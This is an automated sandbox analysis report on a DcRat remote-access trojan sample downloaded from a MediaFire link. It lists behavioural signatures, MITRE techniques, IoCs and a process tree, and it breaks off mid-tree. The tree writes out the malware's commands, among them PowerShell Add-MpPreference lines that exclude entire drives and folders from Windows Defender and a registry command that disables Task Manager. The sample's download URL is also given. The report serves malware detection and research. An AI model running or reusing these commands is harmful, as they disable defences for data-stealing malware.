dcrat | hxxp://mediafire[.]com/file/fvt9fpe00w9iikq/BootstrapperNew[.]zip/file

Resubmissions

01-02-2025 16:54

250201-veg6xa1mgw 10

01-02-2025 16:26

250201-txnwqsslgm 10

Analysis

max time kernel
129s
max time network
141s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
01-02-2025 16:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://mediafire.com/file/fvt9fpe00w9iikq/BootstrapperNew.zip/file

Score

10^/10

dcrat defense_evasion discovery execution infostealer rat spyware stealer

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat

Process spawned unexpected child process 18 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2488	2632	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	396	2632	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2960	2632	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2604	2632	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2020	2632	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1872	2632	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1512	2632	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1764	2632	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	844	2632	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1568	2632	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1788	2632	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1048	2632	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2972	2632	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2008	2632	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2880	2632	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2060	2632	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1828	2632	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2196	2632	schtasks.exe	31

Blocklisted process makes network request 1 IoCs

flow	pid	Process
88	1504	chrome.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 19 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1632	powershell.exe
2340	powershell.exe
2992	powershell.exe
2492	powershell.exe
904	powershell.exe
1976	powershell.exe
2192	powershell.exe
1556	powershell.exe
2772	powershell.exe
1152	powershell.exe
1548	powershell.exe
692	powershell.exe
2160	powershell.exe
600	powershell.exe
1660	powershell.exe
1412	powershell.exe
1588	powershell.exe
1504	powershell.exe
2656	powershell.exe

Disables Task Manager via registry modification
defense_evasion

Executes dropped EXE 3 IoCs

pid	Process
2820	BootstrapperNew.exe
320	providerFontHostperfCrt.exe
2720	dwm.exe

Loads dropped DLL 2 IoCs

pid	Process
836	cmd.exe
836	cmd.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs

Web Service

T1102

flow	ioc
7	mediafire.com

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files\Windows Journal\fr-FR\56085415360792	providerFontHostperfCrt.exe
File created	C:\Program Files\Windows Journal\fr-FR\wininit.exe	providerFontHostperfCrt.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
648	reg.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
396	schtasks.exe
2020	schtasks.exe
1788	schtasks.exe
1828	schtasks.exe
2196	schtasks.exe
2604	schtasks.exe
1764	schtasks.exe
2008	schtasks.exe
2880	schtasks.exe
2960	schtasks.exe
1512	schtasks.exe
1568	schtasks.exe
1048	schtasks.exe
2972	schtasks.exe
2060	schtasks.exe
2488	schtasks.exe
1872	schtasks.exe
844	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2828	chrome.exe
2828	chrome.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe
320	providerFontHostperfCrt.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe
Token: SeShutdownPrivilege	2828	chrome.exe

Suspicious use of FindShellTrayWindow 49 IoCs

pid	Process
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
1440	7zG.exe

Suspicious use of SendNotifyMessage 32 IoCs

pid	Process
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2720	dwm.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2828 wrote to memory of 2628	2828	chrome.exe	30
PID 2828 wrote to memory of 2628	2828	chrome.exe	30
PID 2828 wrote to memory of 2628	2828	chrome.exe	30
PID 2828 wrote to memory of 2820	2828	chrome.exe	32
PID 2828 wrote to memory of 2820	2828	chrome.exe	32
PID 2828 wrote to memory of 2820	2828	chrome.exe	32
PID 2828 wrote to memory of 2820	2828	chrome.exe	32
PID 2828 wrote to memory of 2820	2828	chrome.exe	32
PID 2828 wrote to memory of 2820	2828	chrome.exe	32
PID 2828 wrote to memory of 2820	2828	chrome.exe	32
PID 2828 wrote to memory of 2820	2828	chrome.exe	32
PID 2828 wrote to memory of 2820	2828	chrome.exe	32
PID 2828 wrote to memory of 2820	2828	chrome.exe	32
PID 2828 wrote to memory of 2820	2828	chrome.exe	32
PID 2828 wrote to memory of 2820	2828	chrome.exe	32
PID 2828 wrote to memory of 2820	2828	chrome.exe	32
PID 2828 wrote to memory of 2820	2828	chrome.exe	32
PID 2828 wrote to memory of 2820	2828	chrome.exe	32
PID 2828 wrote to memory of 2820	2828	chrome.exe	32
PID 2828 wrote to memory of 2820	2828	chrome.exe	32
PID 2828 wrote to memory of 2820	2828	chrome.exe	32
PID 2828 wrote to memory of 2820	2828	chrome.exe	32
PID 2828 wrote to memory of 2820	2828	chrome.exe	32
PID 2828 wrote to memory of 2820	2828	chrome.exe	32
PID 2828 wrote to memory of 2820	2828	chrome.exe	32
PID 2828 wrote to memory of 2820	2828	chrome.exe	32
PID 2828 wrote to memory of 2820	2828	chrome.exe	32
PID 2828 wrote to memory of 2820	2828	chrome.exe	32
PID 2828 wrote to memory of 2820	2828	chrome.exe	32
PID 2828 wrote to memory of 2820	2828	chrome.exe	32
PID 2828 wrote to memory of 2820	2828	chrome.exe	32
PID 2828 wrote to memory of 2820	2828	chrome.exe	32
PID 2828 wrote to memory of 2820	2828	chrome.exe	32
PID 2828 wrote to memory of 2820	2828	chrome.exe	32
PID 2828 wrote to memory of 2820	2828	chrome.exe	32
PID 2828 wrote to memory of 2820	2828	chrome.exe	32
PID 2828 wrote to memory of 2820	2828	chrome.exe	32
PID 2828 wrote to memory of 2820	2828	chrome.exe	32
PID 2828 wrote to memory of 2820	2828	chrome.exe	32
PID 2828 wrote to memory of 2820	2828	chrome.exe	32
PID 2828 wrote to memory of 2820	2828	chrome.exe	32
PID 2828 wrote to memory of 2820	2828	chrome.exe	32
PID 2828 wrote to memory of 1504	2828	chrome.exe	33
PID 2828 wrote to memory of 1504	2828	chrome.exe	33
PID 2828 wrote to memory of 1504	2828	chrome.exe	33
PID 2828 wrote to memory of 584	2828	chrome.exe	34
PID 2828 wrote to memory of 584	2828	chrome.exe	34
PID 2828 wrote to memory of 584	2828	chrome.exe	34
PID 2828 wrote to memory of 584	2828	chrome.exe	34
PID 2828 wrote to memory of 584	2828	chrome.exe	34
PID 2828 wrote to memory of 584	2828	chrome.exe	34
PID 2828 wrote to memory of 584	2828	chrome.exe	34
PID 2828 wrote to memory of 584	2828	chrome.exe	34
PID 2828 wrote to memory of 584	2828	chrome.exe	34
PID 2828 wrote to memory of 584	2828	chrome.exe	34
PID 2828 wrote to memory of 584	2828	chrome.exe	34
PID 2828 wrote to memory of 584	2828	chrome.exe	34
PID 2828 wrote to memory of 584	2828	chrome.exe	34
PID 2828 wrote to memory of 584	2828	chrome.exe	34
PID 2828 wrote to memory of 584	2828	chrome.exe	34
PID 2828 wrote to memory of 584	2828	chrome.exe	34
PID 2828 wrote to memory of 584	2828	chrome.exe	34
PID 2828 wrote to memory of 584	2828	chrome.exe	34
PID 2828 wrote to memory of 584	2828	chrome.exe	34

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://mediafire.com/file/fvt9fpe00w9iikq/BootstrapperNew.zip/file
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2828
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef65b9758,0x7fef65b9768,0x7fef65b9778
  2⤵
  PID:2628
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1164 --field-trial-handle=1240,i,6046355396074270045,4611621361573486085,131072 /prefetch:2
  2⤵
  PID:2820
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1492 --field-trial-handle=1240,i,6046355396074270045,4611621361573486085,131072 /prefetch:8
  2⤵
  - Blocklisted process makes network request
  PID:1504
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1576 --field-trial-handle=1240,i,6046355396074270045,4611621361573486085,131072 /prefetch:8
  2⤵
  PID:584
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=1924 --field-trial-handle=1240,i,6046355396074270045,4611621361573486085,131072 /prefetch:1
  2⤵
  PID:2052
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=1836 --field-trial-handle=1240,i,6046355396074270045,4611621361573486085,131072 /prefetch:1
  2⤵
  PID:2132
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1180 --field-trial-handle=1240,i,6046355396074270045,4611621361573486085,131072 /prefetch:2
  2⤵
  PID:1936
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3144 --field-trial-handle=1240,i,6046355396074270045,4611621361573486085,131072 /prefetch:1
  2⤵
  PID:1632
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1728 --field-trial-handle=1240,i,6046355396074270045,4611621361573486085,131072 /prefetch:8
  2⤵
  PID:916
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=3560 --field-trial-handle=1240,i,6046355396074270045,4611621361573486085,131072 /prefetch:1
  2⤵
  PID:1812
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=3788 --field-trial-handle=1240,i,6046355396074270045,4611621361573486085,131072 /prefetch:1
  2⤵
  PID:2316
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=4104 --field-trial-handle=1240,i,6046355396074270045,4611621361573486085,131072 /prefetch:1
  2⤵
  PID:2836
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3612 --field-trial-handle=1240,i,6046355396074270045,4611621361573486085,131072 /prefetch:8
  2⤵
  PID:2516

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:2924

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:1548

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\BootstrapperNew\" -spe -an -ai#7zMap28048:92:7zEvent2956
1⤵
- Suspicious use of FindShellTrayWindow
PID:1440

C:\Users\Admin\Downloads\BootstrapperNew\BootstrapperNew.exe
"C:\Users\Admin\Downloads\BootstrapperNew\BootstrapperNew.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2820
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Browsercommon\IOhgPL0nkibUOseR8JwyIvVZWJDmloCdkfQ.vbe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1956
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Browsercommon\inE.bat" "
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:836
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:648
  - - C:\Browsercommon\providerFontHostperfCrt.exe
      "C:\Browsercommon/providerFontHostperfCrt.exe"
      4⤵
      Executes dropped EXE
      Drops file in Program Files directory
      Suspicious behavior: EnumeratesProcesses
      PID:320
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:600
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2992
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Browsercommon/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2160
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:692
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2340
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1632
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2656
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1556
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2192
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2772
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1504
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1976
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:904
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\cmd.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1588
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\My Documents\OSPPSVC.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1548
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\18fc4542-69f6-11ef-a46c-62cb582c238c\wininit.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1412
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Journal\fr-FR\wininit.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2492
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\18fc4542-69f6-11ef-a46c-62cb582c238c\dwm.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1660
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
